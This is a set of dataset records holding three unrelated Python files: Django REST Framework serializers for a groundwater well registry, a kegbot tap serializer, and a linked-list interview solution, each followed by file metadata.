model = type(self).Meta.model
field = model._meta.get_field(key)
records_data = validated_data.pop(key, None)
foreign_class = FOREIGN_KEYS[key]
if field.one_to_many:
# We just delete the one to many records. It would be too complicated to match them up.
for record in getattr(instance, key).all():
record.delete()
if records_data:
for record_data in records_data:
# We're re-creating this record, and binding it to the current instance, so we need
# to get rid of any redundant/duplicate reference that may exist in the record data
# in order to avoid duplications. (the well we pop, should be the same as the instance
# variable)
record_data.pop('well', None)
                        # Create a new instance of the casing/screen/whatever record.
                        foreign_class.objects.create(
                            well=instance, **record_data)
else:
                raise ValueError('UNEXPECTED FIELD! {}'.format(field))
instance = super().update(instance, validated_data)
return instance
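    # Illustrative sketch (assumption, not original code): the drop-and-
    # recreate strategy above could be expressed generically, e.g.
    #
    #     def _replace_children(parent, model_cls, rows):
    #         model_cls.objects.filter(well=parent).delete()
    #         model_cls.objects.bulk_create(
    #             [model_cls(well=parent, **row) for row in rows])
    #
    # bulk_create skips per-row save() signals, so it is only appropriate
    # where no save-time side effects are relied upon.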
class WellListSerializerV1(serializers.ModelSerializer):
"""Serializes a well record"""
legal_pid = serializers.SerializerMethodField()
drilling_company = serializers.ReadOnlyField(
source='company_of_person_responsible.org_guid')
company_of_person_responsible = serializers.ReadOnlyField(
source='company_of_person_responsible.org_guid')
licenced_status = serializers.ReadOnlyField(source='licenced_status.licenced_status_code')
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
class Meta:
model = Well
fields = (
"well_guid",
"well_tag_number",
"identification_plate_number",
"owner_full_name",
"well_class",
"well_subclass",
"well_status",
"licenced_status",
"street_address",
"city",
"legal_lot",
"legal_plan",
"legal_district_lot",
"legal_block",
"legal_section",
"legal_township",
"legal_range",
"land_district",
"legal_pid",
"well_location_description",
"construction_start_date",
"construction_end_date",
"alteration_start_date",
"alteration_end_date",
"decommission_start_date",
"decommission_end_date",
"drilling_company", # old name of company_of_person_responsible
"company_of_person_responsible",
"well_identification_plate_attached",
"id_plate_attached_by",
"water_supply_system_name",
"water_supply_system_well_name",
"latitude",
"longitude",
"coordinate_acquisition_code",
"ground_elevation",
"ground_elevation_method",
"drilling_methods",
"well_orientation_status",
"surface_seal_material",
"surface_seal_thickness",
"surface_seal_method",
"surface_seal_depth",
"backfill_type",
"backfill_depth",
"liner_material",
"liner_diameter",
"liner_thickness",
"liner_from",
"liner_to",
"screen_intake_method",
"screen_type",
"screen_material",
"other_screen_material",
"screen_opening",
"screen_bottom",
"other_screen_bottom",
"screen_information",
"filter_pack_from",
"filter_pack_to",
"filter_pack_thickness",
"filter_pack_material",
"filter_pack_material_size",
"development_methods",
"development_hours",
"development_notes",
"yield_estimation_method",
"yield_estimation_rate",
"yield_estimation_duration",
"well_yield_unit",
"static_level_before_test",
"drawdown",
"hydro_fracturing_performed",
"hydro_fracturing_yield_increase",
"recommended_pump_depth",
"recommended_pump_rate",
"water_quality_characteristics",
"water_quality_colour",
"water_quality_odour",
"total_depth_drilled",
"finished_well_depth",
"well_yield",
"diameter",
"observation_well_number",
"observation_well_status",
"ems",
"aquifer",
"utm_zone_code",
"utm_northing",
"utm_easting",
"bcgs_id",
"decommission_reason",
"decommission_method",
"decommission_sealant_material",
"decommission_backfill_material",
"decommission_details",
"aquifer_vulnerability_index",
"aquifer_lithology",
"storativity",
"transmissivity",
"hydraulic_conductivity",
"specific_storage",
"specific_yield",
"testing_method",
"testing_duration",
"analytic_solution_type",
"boundary_effect",
"final_casing_stick_up",
"bedrock_depth",
"artesian_flow",
"artesian_pressure",
"artesian_pressure_head",
"artesian_conditions",
"well_cap_type",
"well_disinfected_status",
"static_water_level",
)
class WellListAdminSerializerV1(WellListSerializerV1):
class Meta:
model = Well
fields = WellListSerializerV1.Meta.fields + (
'create_user',
'create_date',
'update_user',
'update_date',
'well_publication_status',
'owner_mailing_address',
'owner_city',
'owner_province_state',
'owner_postal_code',
'internal_comments',
)
class WellExportSerializerV1(WellListSerializerV1):
"""Serializes a well for export (using display names for codes, etc)"""
well_class = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_subclass = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
licenced_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
land_district = serializers.SlugRelatedField(read_only=True, slug_field='name')
drilling_company = serializers.CharField(read_only=True, source='company_of_person_responsible.name')
ground_elevation_method = serializers.SlugRelatedField(read_only=True,
slug_field='description')
surface_seal_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
surface_seal_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
liner_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_intake_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_type = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_opening = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_bottom = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_yield_unit = serializers.SlugRelatedField(read_only=True, slug_field='description')
observation_well_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
coordinate_acquisition_code = serializers.SlugRelatedField(read_only=True,
slug_field='description')
bcgs_id = serializers.SlugRelatedField(read_only=True, slug_field='bcgs_number')
decommission_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
aquifer = serializers.PrimaryKeyRelatedField(read_only=True)
aquifer_lithology = serializers.SlugRelatedField(read_only=True, slug_field='description')
yield_estimation_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
development_methods = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
drilling_methods = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
water_quality_characteristics = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
hydro_fracturing_performed = serializers.CharField(read_only=True,
source='get_hydro_fracturing_performed_display')
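    # Names of Well's concrete many-to-many fields, collected once at class
    # definition and used in to_representation() to comma-join list values.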
m2m_relations = {
field.name
for field in Well._meta.get_fields()
if field.many_to_many and not field.auto_created
}
def __init__(self, *args, **kwargs):
"""
Limit responses to requested fields
If we get a 'fields' context kwarg, then limit results to the included
fields.
"""
super().__init__(*args, **kwargs)
context = kwargs.get('context', {})
fields = context.get('fields', None)
if fields is not None:
excluded_fields = set(self.fields) - set(fields)
for field_name in excluded_fields:
self.fields.pop(field_name)
def to_representation(self, instance):
"""
Instead of arrays, return comma delimited strings for export.
"""
data = super().to_representation(instance)
for field_name in self.m2m_relations:
if field_name in data:
data[field_name] = ','.join(data[field_name])
return data
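# A minimal usage sketch (assumption: `wells` stands for any Well queryset and
# the example values are invented). Passing `fields` via the serializer context
# limits the exported columns, and many-to-many values arrive comma-joined:
#
#     serializer = WellExportSerializerV1(
#         wells, many=True,
#         context={'fields': ['well_tag_number', 'drilling_methods']})
#     # e.g. {'well_tag_number': 12345, 'drilling_methods': 'Air Rotary,Cable Tool'}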
class WellExportAdminSerializerV1(WellExportSerializerV1):
"""Serializes a well for export (using display names for codes, etc)"""
owner_province_state = serializers.SlugRelatedField(read_only=True,
slug_field='description')
well_publication_status = serializers.SlugRelatedField(read_only=True,
slug_field='description')
class Meta:
model = Well
fields = WellListAdminSerializerV1.Meta.fields
class WellTagSearchSerializer(serializers.ModelSerializer):
""" serializes fields used for searching for well tags """
class Meta:
model = Well
fields = ("well_tag_number", "owner_full_name")
class WellLocationSerializerV1(serializers.ModelSerializer):
""" serializes well locations v1 """
class Meta:
model = Well
fields = ("well_tag_number", "identification_plate_number",
"latitude", "longitude", "street_address", "city")
class WellDrawdownSerializer(serializers.ModelSerializer):
screen_set = ScreenSerializer(many=True)
intended_water_use = serializers.ReadOnlyField(source='intended_water_use.description')
aquifer_subtype = serializers.ReadOnlyField(source='aquifer.subtype.description')
distance = serializers.FloatField(required=False)
class Meta:
model = Well
fields = (
"well_tag_number",
"static_water_level",
"screen_set",
"well_yield",
"diameter",
"aquifer",
"distance",
"latitude",
"longitude",
"well_yield_unit",
"finished_well_depth",
"street_address",
"intended_water_use",
"aquifer_subtype"
)
def to_representation(self, instance):
details = super().to_representation(instance)
if instance.aquifer and instance.aquifer.subtype:
details['aquifer_hydraulically_connected'] = instance.aquifer.subtype.code in HYDRAULIC_SUBTYPES
return details
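# Illustration (hedged): assuming HYDRAULIC_SUBTYPES, imported elsewhere in
# this module, is a set of aquifer subtype codes, a well whose aquifer matches
# gains one extra key; wells without an aquifer subtype omit it entirely:
#     WellDrawdownSerializer(well).data.get('aquifer_hydraulically_connected')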
class WellLithologySerializer(serializers.ModelSerializer):
lithologydescription_set = LithologyDescriptionSummarySerializer(many=True)
class Meta:
model = Well
fields = (
"well_tag_number",
"latitude",
"longitude",
"lithologydescription_set"
)
| 37.166964 | 110 | 0.622913 |
35a24584770ba0397dfffef5db85c19ae8e1cdec | 327 | py | Python | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | ["MIT"] | null | null | null | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | ["MIT"] | null | null | null | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | ["MIT"] | null | null | null |
from rest_framework.serializers import ModelSerializer
from .models import Tap
class TapSerializer(ModelSerializer):
class Meta:
model = Tap
fields = (
'id', 'channel', 'pulses_per_ml', 'current_level', 'total_ml',
'dispensed_ml', 'beverage', 'pours',
)
depth = 1
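# A minimal usage sketch (assumes at least one Tap row exists in the database).
# With depth = 1, related objects such as `beverage` serialize as nested dicts
# rather than primary keys:
#     TapSerializer(Tap.objects.first()).data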
| 23.357143 | 74 | 0.608563 |
719e752b9a39dd0362ef4c73f7a54ad04ad881a4 | 1240 | py | Python | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | ["MIT"] | null | null | null | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | ["MIT"] | null | null | null | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | ["MIT"] | null | null | null |
"""Given a linked list, remove the nth node from the end of the list and return its head.
For example,
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass.
"""
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
def remove_nth_from_end(head, n):
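    """Single-pass removal using two pointers kept n nodes apart.

    ptr2 runs ahead; once it has taken n steps, ptr1 starts moving too, so
    when ptr2 reaches the tail, ptr1 sits on the node to delete and ptr0 on
    its predecessor (ptr0 == ptr1 only when the head itself is removed).
    """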
ptr0 = head
ptr1 = head
ptr2 = head
ptr2_steps = 0
while ptr2.next:
ptr2 = ptr2.next
ptr2_steps += 1
if ptr2_steps >= n:
ptr0 = ptr1
ptr1 = ptr1.next
ptr0.next = ptr1.next
if ptr0 == ptr1:
head = head.next
return head
if __name__ == "__main__":
n = 2
head = ListNode(1)
head.next = ListNode(2)
head.next.next = ListNode(3)
head.next.next.next = ListNode(4)
head.next.next.next.next = ListNode(5)
source = []
ptr = head
while ptr:
source.append(ptr.val)
ptr = ptr.next
print(source)
head = remove_nth_from_end(head, n)
ptr = head
result = []
while ptr:
result.append(ptr.val)
ptr = ptr.next
print(result)
| 18.787879 | 85 | 0.575 |